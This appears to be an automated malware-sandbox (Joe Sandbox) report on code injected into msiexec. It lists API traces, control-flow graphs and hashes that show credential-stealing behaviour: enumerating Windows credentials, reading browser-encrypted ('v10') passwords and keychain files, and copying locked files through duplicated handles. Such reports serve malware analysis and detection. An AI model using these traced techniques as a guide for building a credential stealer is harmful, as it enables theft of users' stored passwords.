                                                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                              • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                              • CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                              • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                              • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                              • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                                              • _wcsicmp.MSVCRT ref: 0040DED8
                                                                                              • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                                              • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                                              • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                                              • memset.MSVCRT ref: 0040DF5F
                                                                                              • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                                                              • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                                              • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                                              • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                                              • API String ID: 708747863-3398334509
                                                                                              • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                              • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                                              • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                              • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 578 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 581 413f00-413f11 Process32NextW 578->581 582 413da5-413ded OpenProcess 581->582 583 413f17-413f24 CloseHandle 581->583 584 413eb0-413eb5 582->584 585 413df3-413e26 memset call 413f27 582->585 584->581 586 413eb7-413ebd 584->586 591 413e79-413e9d call 413959 call 413ca4 585->591 592 413e28-413e35 585->592 588 413ec8-413eda call 4099f4 586->588 589 413ebf-413ec6 free 586->589 593 413edb-413ee2 588->593 589->593 605 413ea2-413eae CloseHandle 591->605 596 413e61-413e68 592->596 597 413e37-413e44 GetModuleHandleW 592->597 598 413ee4 593->598 599 413ee7-413efe 593->599 596->591 602 413e6a-413e76 596->602 597->596 601 413e46-413e5c GetProcAddress 597->601 598->599 599->581 601->596 602->591 605->584
                                                                                              APIs
                                                                                                • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
                                                                                              • memset.MSVCRT ref: 00413D7F
                                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                              • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                              • memset.MSVCRT ref: 00413E07
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                              • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                                                              • free.MSVCRT ref: 00413EC1
                                                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                              • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                                                              • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                              • API String ID: 1344430650-1740548384
                                                                                              • Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                                              • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                              • Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                                              • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                                                                              APIs
                                                                                              • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                                              • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                              • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                              • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: Resource$FindLoadLockSizeof
                                                                                              • String ID:
                                                                                              • API String ID: 3473537107-0
                                                                                              • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                              • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                                              • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                              • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                                              APIs
                                                                                              • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                              • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileFind$FirstNext
                                                                                              • String ID:
                                                                                              • API String ID: 1690352074-0
                                                                                              • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                              • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                              • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                              • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0041898C
                                                                                              • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: InfoSystemmemset
                                                                                              • String ID:
                                                                                              • API String ID: 3558857096-0
                                                                                              • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                              • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                              • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                              • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 6 4455a8-4455e3 memset call 403988 wcsrchr 3->6 7 4457fb 3->7 40 44558e-445594 call 444b06 4->40 41 44557e-44558c call 4136c0 call 41366b 4->41 15 4455e5 6->15 16 4455e8-4455f9 6->16 10 445800-445809 7->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 43 445823-445826 14->43 15->16 21 445672-445683 call 40a889 call 403fbe 16->21 22 4455fb-445601 16->22 51 445879-44587c 18->51 23 44594f-445958 19->23 24 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->24 79 445685 21->79 80 4456b2-4456b5 call 40b1ab 21->80 30 445605-445607 22->30 31 445603 22->31 28 4459f2-4459fa 23->28 29 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 23->29 141 44592d-445945 call 40b6ef 24->141 142 44594a 24->142 45 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 28->45 46 445b29-445b32 28->46 146 4459d0-4459e8 call 40b6ef 29->146 147 4459ed 29->147 30->21 39 445609-44560d 30->39 31->30 39->21 49 44560f-445641 call 4087b3 call 40a889 call 4454bf 39->49 40->3 41->40 52 44584c-445854 call 40b1ab 43->52 53 445828 43->53 184 445b08-445b15 call 40ae51 45->184 54 445c7c-445c85 46->54 55 445b38-445b96 memset * 3 46->55 157 445665-445670 call 40b1ab 49->157 158 445643-445663 call 40a9b5 call 4087b3 49->158 67 4458a2-4458aa call 40b1ab 51->67 68 44587e 51->68 52->13 69 44582e-445847 call 40a9b5 call 4087b3 53->69 63 445d1c-445d25 54->63 64 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 54->64 70 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 55->70 71 445b98-445ba0 55->71 84 445fae-445fb2 63->84 85 445d2b-445d3b 63->85 163 445cf5 64->163 164 445cfc-445d03 64->164 67->19 77 445884-44589d call 40a9b5 call 4087b3 68->77 144 445849 69->144 247 445c77 70->247 71->70 78 445ba2-445bcf call 4099c6 call 445403 call 445389 71->78 149 44589f 77->149 78->54 94 44568b-4456a4 call 40a9b5 call 4087b3 79->94 111 4456ba-4456c4 80->111 99 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 85->99 100 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 85->100 151 4456a9-4456b0 94->151 169 445d67-445d6c 99->169 170 445d71-445d83 call 445093 99->170 194 445e17 100->194 195 445e1e-445e25 100->195 124 4457f9 111->124 125 4456ca-4456d3 call 413cfa call 413d4c 111->125 124->7 177 4456d8-4456f7 call 40b2cc call 413fa6 125->177 141->142 142->23 144->52 146->147 147->28 149->67 151->80 151->94 157->111 158->157 163->164 174 445d05-445d13 164->174 175 445d17 164->175 179 445fa1-445fa9 call 40b6ef 169->179 170->84 174->175 175->63 208 4456fd-445796 memset * 4 call 409c70 * 3 177->208 209 4457ea-4457f7 call 413d29 177->209 179->84 198 445b17-445b27 call 40aebe 184->198 199 445aa3-445ab0 call 40add4 184->199 194->195 200 445e27-445e59 call 40b2cc call 409d1f call 409b98 195->200 201 445e6b-445e7e call 445093 195->201 198->46 199->184 223 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 199->223 242 445e62-445e69 200->242 243 445e5b 200->243 222 445f67-445f99 call 40b2cc call 409d1f call 409b98 201->222 208->209 246 445798-4457ca call 40b2cc call 409d1f call 409b98 208->246 209->10 222->84 254 445f9b 222->254 223->184 242->201 248 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 242->248 243->242 246->209 264 4457cc-4457e5 call 4087b3 246->264 247->54 265 445f4d-445f5a call 40ae51 248->265 254->179 264->209 269 445ef7-445f04 call 40add4 265->269 270 445f5c-445f62 call 40aebe 265->270 269->265 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->222 274->265 281 445f3a-445f48 call 445093 274->281 281->265
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 004455C2
                                                                                              • wcsrchr.MSVCRT ref: 004455DA
                                                                                              • memset.MSVCRT ref: 0044570D
                                                                                              • memset.MSVCRT ref: 00445725
                                                                                                • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                                • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                                • Part of subcall function 0040BDB0: CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                                • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                                                • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                                • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                              • memset.MSVCRT ref: 0044573D
                                                                                              • memset.MSVCRT ref: 00445755
                                                                                              • memset.MSVCRT ref: 004458CB
                                                                                              • memset.MSVCRT ref: 004458E3
                                                                                              • memset.MSVCRT ref: 0044596E
                                                                                              • memset.MSVCRT ref: 00445A10
                                                                                              • memset.MSVCRT ref: 00445A28
                                                                                              • memset.MSVCRT ref: 00445AC6
                                                                                                • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                                • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                                • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                              • memset.MSVCRT ref: 00445B52
                                                                                              • memset.MSVCRT ref: 00445B6A
                                                                                              • memset.MSVCRT ref: 00445C9B
                                                                                              • memset.MSVCRT ref: 00445CB3
                                                                                              • _wcsicmp.MSVCRT ref: 00445D56
                                                                                              • memset.MSVCRT ref: 00445B82
                                                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                                • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                              • memset.MSVCRT ref: 00445986
                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                                              • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                              • API String ID: 2263259095-3798722523
                                                                                              • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                              • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                              • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                              • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                              • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                                                                              • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                                                              • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                              • String ID: $/deleteregkey$/savelangfile
                                                                                              • API String ID: 2744995895-28296030
                                                                                              • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                              • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                              • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                              • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040B71C
                                                                                                • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                                • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                              • wcsrchr.MSVCRT ref: 0040B738
                                                                                              • memset.MSVCRT ref: 0040B756
                                                                                              • memset.MSVCRT ref: 0040B7F5
                                                                                              • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                              • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                                              • memset.MSVCRT ref: 0040B851
                                                                                              • memset.MSVCRT ref: 0040B8CA
                                                                                              • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                                                                                                • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                              • memset.MSVCRT ref: 0040BB53
                                                                                              • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                                              • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$Freewcsrchr$AddressCloseCreateFileHandleLibraryLocalProcmemcmpmemcpywcscpy
                                                                                              • String ID: chp$v10
                                                                                              • API String ID: 4290143792-2783969131
                                                                                              • Opcode ID: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                                                              • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                              • Opcode Fuzzy Hash: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                                                              • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 505 4091b8-40921b memset call 40a6e6 call 444432 510 409520-409526 505->510 511 409221-40923b call 40b273 call 438552 505->511 515 409240-409248 511->515 516 409383-4093ab call 40b273 call 438552 515->516 517 40924e-409258 call 4251c4 515->517 529 4093b1 516->529 530 4094ff-40950b call 443d90 516->530 522 40937b-40937e call 424f26 517->522 523 40925e-409291 call 4253cf * 2 call 4253af * 2 517->523 522->516 523->522 553 409297-409299 523->553 531 4093d3-4093dd call 4251c4 529->531 530->510 539 40950d-409511 530->539 540 4093b3-4093cc call 4253cf * 2 531->540 541 4093df 531->541 539->510 543 409513-40951d call 408f2f 539->543 540->531 557 4093ce-4093d1 540->557 545 4094f7-4094fa call 424f26 541->545 543->510 545->530 553->522 555 40929f-4092a3 553->555 555->522 556 4092a9-4092ba 555->556 558 4092bc 556->558 559 4092be-4092e3 memcpy memcmp 556->559 557->531 560 4093e4-4093fb call 4253af * 2 557->560 558->559 561 409333-409345 memcmp 559->561 562 4092e5-4092ec 559->562 560->545 570 409401-409403 560->570 561->522 565 409347-40935f memcpy 561->565 562->522 564 4092f2-409331 memcpy * 2 562->564 567 409363-409378 memcpy 564->567 565->567 567->522 570->545 571 409409-40941b memcmp 570->571 571->545 572 409421-409433 memcmp 571->572 573 4094a4-4094b6 memcmp 572->573 574 409435-40943c 572->574 573->545 576 4094b8-4094ed memcpy * 2 573->576 574->545 575 409442-4094a2 memcpy * 3 574->575 577 4094f4 575->577 576->577 577->545
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 004091E2
                                                                                                • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                              • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                              • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                              • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                                              • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                                              • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                                                                              • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                                              • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                                              • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                                                                              • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                                                                              • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                                              • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                                              • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                                              • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                                                                              • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                                              • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                              • String ID:
                                                                                              • API String ID: 3715365532-3916222277
                                                                                              • Opcode ID: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                                                              • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                              • Opcode Fuzzy Hash: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                                                              • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                                • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                              • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                              • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                              • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                              • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                              • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                              • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                              • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                              • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                              • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                              • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
